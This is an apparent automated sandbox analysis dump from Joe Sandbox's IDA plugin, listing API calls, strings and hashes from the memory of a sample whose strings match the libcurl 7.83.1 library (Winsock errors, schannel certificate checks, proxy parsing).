                                        • Opcode ID: 0a5f7abc3c84792fed769ff5132b36dfe2be7d617af68c903fd430193ef2a741
                                        • Instruction ID: bc53ce7e7cec1daf701315040798d8cd09954290dbb65695d02b67bd36aa0e7a
                                        • Opcode Fuzzy Hash: 0a5f7abc3c84792fed769ff5132b36dfe2be7d617af68c903fd430193ef2a741
                                        • Instruction Fuzzy Hash: E211A371B04A08AFEB089B60DD49FEC7BB2FF46318F14801DF801D6452DB759D91CA42
                                        APIs
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Host not found,000000FF,?,000DA10B), ref: 000D9EF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: strncpy
                                        • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                        • API String ID: 3301158039-3442644082
                                        • Opcode ID: ef9e607ec44ecfe6a757011c388057cef190958559fab8f667dd44b6bf6de6e1
                                        • Instruction ID: 129b0d7fc56179f8d16acaff338b921a8cabb99afda79fa7cd7fd9e10b3cbab5
                                        • Opcode Fuzzy Hash: ef9e607ec44ecfe6a757011c388057cef190958559fab8f667dd44b6bf6de6e1
                                        • Instruction Fuzzy Hash: E441345030D361978B38C62C67181799754EB12304B24427FB9A3EF799D25BCEA2A372
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 0010E702
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010E766
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010EB75
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010EBBD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
                                        • API String ID: 1294909896-2896079655
                                        • Opcode ID: 5f479c1faacb3277777cf7cbfd251c5d8e717eeeb8ff6bde5d4a53cf4d9fd675
                                        • Instruction ID: 1e7e865f18ee466521bb3075e2d3bfe62548a1ed4aaaa1b5855267b218cdb3d5
                                        • Opcode Fuzzy Hash: 5f479c1faacb3277777cf7cbfd251c5d8e717eeeb8ff6bde5d4a53cf4d9fd675
                                        • Instruction Fuzzy Hash: 63E1E5717083629FD728AB61E894A6FB7D5EF94710F14882EF895932C1DBB09C05CBD2
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000C688D
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000C68A1
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 000C68C1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C68F7
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C691B
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C697E
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C6988
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00118DD4), ref: 000C699E
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C69DA
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C69E6
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(001174AB), ref: 000C6A30
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C6A7A
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C6A96
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C6AC9
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C6AD9
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(001174AB), ref: 000C6AF9
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00118DD4), ref: 000C6B14
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C6B7F
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C6BD0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C6C50
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C6C58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_func$_strdup$free$___from_strstr_to_strchrfclosefopenmalloc
                                        • String ID: %.*s=%s$Couldn't read data from file "%s", this makes an empty POST.$f
                                        • API String ID: 288693899-3884612863
                                        • Opcode ID: f7063d4e7c351e9d2b5e70016c32c893ee0a2d00bc7edb13af2b0159ed3590d1
                                        • Instruction ID: 72b0e8adfc397805cb398fde3bc54bb6abcb2144b360142a3340349fb8cc04eb
                                        • Opcode Fuzzy Hash: f7063d4e7c351e9d2b5e70016c32c893ee0a2d00bc7edb13af2b0159ed3590d1
                                        • Instruction Fuzzy Hash: 8EC1E4752087418FC769CF34D894EAEB7E2AFC9314F18492DF48697242DB72DC468B15
                                        APIs
                                        • CertOpenStore.CRYPT32(00000002,00000000,00000000,00002000,00000000), ref: 0010F4D6
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010F4E7
                                        • CertCreateCertificateChainEngine.CRYPT32(?,?), ref: 0010F5D8
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010F5E3
                                        • CertGetCertificateChain.CRYPT32(?,?,00000000,?,00000010,00000000,00000000,?), ref: 0010F698
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010F6A3
                                        • CertFreeCertificateChainEngine.CRYPT32(00000000), ref: 0010F7C1
                                        • CertCloseStore.CRYPT32(?,00000000), ref: 0010F7D4
                                        • CertFreeCertificateChain.CRYPT32(00000000), ref: 0010F7E9
                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 0010F7FE
                                        Strings
                                        • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 0010F705
                                        • schannel: failed to create certificate chain engine: %s, xrefs: 0010F5F8
                                        • schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 0010F729
                                        • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 0010F6F6
                                        • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 0010F4B8
                                        • schannel: CertGetCertificateChain failed: %s, xrefs: 0010F6B8
                                        • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 0010F711
                                        • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 0010F71D
                                        • schannel: CertGetCertificateChain error mask: 0x%08x, xrefs: 0010F739
                                        • schannel: failed to create certificate store: %s, xrefs: 0010F4FC
                                        • schannel: Failed to read remote certificate context: %s, xrefs: 0010F7A4
                                        • (memory blob), xrefs: 0010F540
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Cert$Certificate$Chain$ErrorFreeLast$EngineStore$CloseContextCreateOpen
                                        • String ID: (memory blob)$schannel: CertGetCertificateChain error mask: 0x%08x$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain engine: %s$schannel: failed to create certificate store: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                                        • API String ID: 713146188-3435997996
                                        • Opcode ID: ca9d9901fa38f32a906554963ad42f3bf8bfed2f0b00a7ae977ffc7fc63a2ca2
                                        • Instruction ID: 89912455f7997b3dbf8f38cc06e7a22b78cde3520a6e198488d17c393c18bd5c
                                        • Opcode Fuzzy Hash: ca9d9901fa38f32a906554963ad42f3bf8bfed2f0b00a7ae977ffc7fc63a2ca2
                                        • Instruction Fuzzy Hash: 21D1B270A00214DFDB398F14DC86BEA77B5AF49310F1441B9E989AB6D1DBB09D82CF91
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 00103177
                                        • ___from_strstr_to_strchr.LIBCMT ref: 001031BB
                                        • ___from_strstr_to_strchr.LIBCMT ref: 001031CC
                                        • ___from_strstr_to_strchr.LIBCMT ref: 001031E0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010324F
                                        • ___from_strstr_to_strchr.LIBCMT ref: 00103278
                                        • ___from_strstr_to_strchr.LIBCMT ref: 0010328B
                                        • ___from_strstr_to_strchr.LIBCMT ref: 0010329F
                                        • ___from_strstr_to_strchr.LIBCMT ref: 001032B3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00103337
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr$free
                                        • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.83.1%sQUIT$CLIENT libcurl 7.83.1DEFINE %s %sQUIT$CLIENT libcurl 7.83.1MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                        • API String ID: 3654317688-2903917456
                                        • Opcode ID: a351b5bd82112912083b2b5306ba4b0866fb6cbc344b2eb3cba55aeeadc009e2
                                        • Instruction ID: eed981a9aeb865b6cc85af96aa2ba859a0c4ce8a168e298330e5e6e734f6ffaf
                                        • Opcode Fuzzy Hash: a351b5bd82112912083b2b5306ba4b0866fb6cbc344b2eb3cba55aeeadc009e2
                                        • Instruction Fuzzy Hash: 167174316083525FE729562C6C02B676BDDDFA6774F24002EF8D5AB2C2EFB18E418361
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FFAC5
                                        • WSACreateEvent.WS2_32 ref: 000FFB36
                                        • WSAGetLastError.WS2_32 ref: 000FFB46
                                        • WSAEventSelect.WS2_32(?,00000000,00000021), ref: 000FFB69
                                        • WSACloseEvent.WS2_32(00000000), ref: 000FFB75
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 000FFB84
                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 000FFB97
                                        • WaitForMultipleObjects.API-MS-WIN-CORE-SYNCH-L1-2-1(00000001,?,00000000,00000064), ref: 000FFBD6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Event$CloseCreateErrorFileHandleLastMultipleObjectsSelectTypeWaitcalloc
                                        • String ID: $Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                                        • API String ID: 2419709179-2457143120
                                        • Opcode ID: a9f46520efbdfb9e2b93e152bbb1f050326ab9f9b87fe049c8f090455684506d
                                        • Instruction ID: a6ed672813e0e3577509c23cec0740a1203a5e200158472f519fb162f6d50274
                                        • Opcode Fuzzy Hash: a9f46520efbdfb9e2b93e152bbb1f050326ab9f9b87fe049c8f090455684506d
                                        • Instruction Fuzzy Hash: 07B1E1715083069FD724CF24C988BBE7BE6AF88710F14453EFA89DB691D77188419BA2
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 000C115C
                                          • Part of subcall function 000D027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,000C10B6), ref: 000D028E
                                          • Part of subcall function 000D027A: __alldvrm.LIBCMT ref: 000D02A7
                                          • Part of subcall function 000D027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D02D1
                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000C10C7
                                        • _localtime64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 000C1116
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00116C58), ref: 000C117D
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 000C1210
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 000C1221
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000001,?), ref: 000C12D3
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,?), ref: 000C1321
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 000C1361
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_funcfwrite$CounterPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_localtime64_time64fopen
                                        • String ID: %02d:%02d:%02d.%06ld $%s%s $%s== Info: %.*s$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$Failed to create/open output$[%zu bytes data]
                                        • API String ID: 4066690675-628975109
                                        • Opcode ID: 8f0d32c6faef9bedcd32f8b7bd4b8e230f494477b722c74f051801979121b109
                                        • Instruction ID: a2be65e50c9bb7081ea8d95208b58dd4d36ad9d6dc1f68950d71f9940b14188f
                                        • Opcode Fuzzy Hash: 8f0d32c6faef9bedcd32f8b7bd4b8e230f494477b722c74f051801979121b109
                                        • Instruction Fuzzy Hash: 76B1E171E04245AFCB25DFA89944FEE7BF5FB4A304F18412DE540A3A52D3729982CBA0
                                        APIs
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sha256//,00000008), ref: 000E7907
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7936
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7994
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00118DD4), ref: 000E7AA3
                                        • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 000E7ABA
                                        • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000E7ACE
                                        • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 000E7ADF
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7B16
                                        • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 000E7B2E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7BB6
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7BC8
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000E7BCE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$fseekmalloc$fclosefopenfreadftellstrncmp
                                        • String ID: public key hash: sha256//%s$;sha256//$sha256//
                                        • API String ID: 477934247-1625489732
                                        • Opcode ID: 7f0f30d17d2d5dff60f5e35c8da7075ebeb9b0bb3f1a379eaa5a4253a381154f
                                        • Instruction ID: 287959459283395f0ca1370b4f11ce26eb721ced58c164ff91a695c5b0e3fa5b
                                        • Opcode Fuzzy Hash: 7f0f30d17d2d5dff60f5e35c8da7075ebeb9b0bb3f1a379eaa5a4253a381154f
                                        • Instruction Fuzzy Hash: F2911231A04659EFCF259F66EC04AAEBBB6EF80350F14407AE909B3251EB705E418B91
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E1740
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E1765
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8BF9), ref: 000E1782
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C8BF9), ref: 000E17A6
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E17CB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E17F5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E181D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1876
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1893
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E18B0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E18EF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E190C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1929
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1946
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1963
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1980
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E199D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E19BA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E19D7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E19F4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1A11
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1A2E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1A4B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1A68
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1AE2
                                          • Part of subcall function 000DD126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD13A
                                          • Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C3167), ref: 000D0E2C
                                          • Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E41
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1AB8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 7e56519a1bbaad944ce8901f43cc72d35c3b9c189116121c7db18167c67ce3f4
                                        • Instruction ID: 42364cab38bf89de2532671d552a6657ea1e75966125a1fc170d6b521d22621d
                                        • Opcode Fuzzy Hash: 7e56519a1bbaad944ce8901f43cc72d35c3b9c189116121c7db18167c67ce3f4
                                        • Instruction Fuzzy Hash: 11B1F931714916EBDB0D5F34EC545A8FBA2FF88310F14812FE46A93662CF7438619BA6
                                        APIs
                                          • Part of subcall function 000D5D67: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000CA827,?,?,00000000), ref: 000D5D7A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4013
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4025
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4039
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$calloc
                                        • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
                                        • API String ID: 3095843317-874090715
                                        • Opcode ID: ef99635be4ef8a6e6afcf9914b6aff1bc1becd6a9b8f515849055a7f36990c87
                                        • Instruction ID: 012e2e8fd5b3209e32e89481b42b07b61cccf10ddb565f8903004569ff17f85f
                                        • Opcode Fuzzy Hash: ef99635be4ef8a6e6afcf9914b6aff1bc1becd6a9b8f515849055a7f36990c87
                                        • Instruction Fuzzy Hash: 99C1C231E04259DFDB249B56D849BEEBBF6EF84310F14803AE805BB391DB709E418B61
                                        APIs
                                        • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00103BC3
                                        • _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 00103BE1
                                        • _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,LocalMachine,00000000), ref: 00103C00
                                        • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00103CC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _mbschr_mbsnbcmp
                                        • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
                                        • API String ID: 866314863-3209074899
                                        • Opcode ID: 6e07131fd48c060ad249a6da534e79688381422982507b2dab860b07171d2d9d
                                        • Instruction ID: 8a9effaad06b9d108007cb4d649540d504e13f64662b1c60fbce65e7378676e8
                                        • Opcode Fuzzy Hash: 6e07131fd48c060ad249a6da534e79688381422982507b2dab860b07171d2d9d
                                        • Instruction Fuzzy Hash: 7941F631204306EFE7145F65FE85B7B3BADEF80748F24801AE891E3282E7B08A549651
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF06B
